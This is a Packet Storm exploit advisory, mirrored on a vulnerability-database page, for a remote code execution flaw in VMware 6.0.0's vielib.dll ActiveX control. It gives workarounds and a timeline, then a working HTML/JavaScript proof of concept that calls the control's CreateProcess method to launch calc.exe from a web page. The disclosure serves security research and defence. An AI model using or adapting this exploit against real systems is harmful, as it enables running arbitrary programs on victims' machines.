Lucene search
K

vmware-create-exec.txt

🗓️ 31 Jul 2007 00:00:00Reported by callAXType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

VmWare Inc version 6.0.0 CreateProcess & CreateProcessEx Remote Code Execution Exploit. vielib.dll vulnerability

Code
`:. GOODFELLAS Security Research TEAM .:  
:. http://goodfellas.shellcode.com.ar .:  
  
VmWare Inc version 6.0.0 CreateProcess & CreateProcessEx Remode Code Execution Exploit  
======================================================================================  
  
Internal ID: VULWAR200707300.  
-----------  
  
Introduction  
------------  
vielib.dll is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Company.  
  
  
Tested In  
---------  
- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.  
  
  
Summary  
-------  
The CreateProcess & CreateProcessEx method doesn't check if they're being called  
from the application, or malicious users. Remote Attacker could craft a html page  
and execute code in a remote system with the actual user privileges.  
  
  
Impact  
------  
Any computer that uses this Sofware will be exposed to Remote Execution Code.  
  
  
Workaround  
----------  
- Activate the Kill bit zero in clsid:0F748FDE-0597-443C-8596-71854C5EA20A  
- Unregister vielib.dll using regsvr32.  
  
  
Timeline  
--------  
July 30 2007 -- Bug Discovery.  
July 30 2007 -- Exploit published.  
  
  
Credits  
-------  
* callAX <[email protected]>  
* GoodFellas Security Research Team <goodfellas.shellcode.com.ar>  
  
  
Technical Details  
-----------------  
  
  
<HTML>  
<BODY>  
<object id=_9090909090 classid="clsid:{0F748FDE-0597-443C-8596-71854C5EA20A}"></object>  
<SCRIPT>  
  
function _d0_() {  
  
ba="c:\\windows\\system32\\calc.exe"  
ad="c:\\windows\\system32\\calc.exe"  
fO="c:\\windows\\system32\\"  
Od=1  
  
_9090909090.CreateProcess(ba, ad, fO, Od)  
}  
  
</SCRIPT>  
<input language=JavaScript onclick=_d0_() type=button value="Proof of Concept">  
</BODY>  
</HTML>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation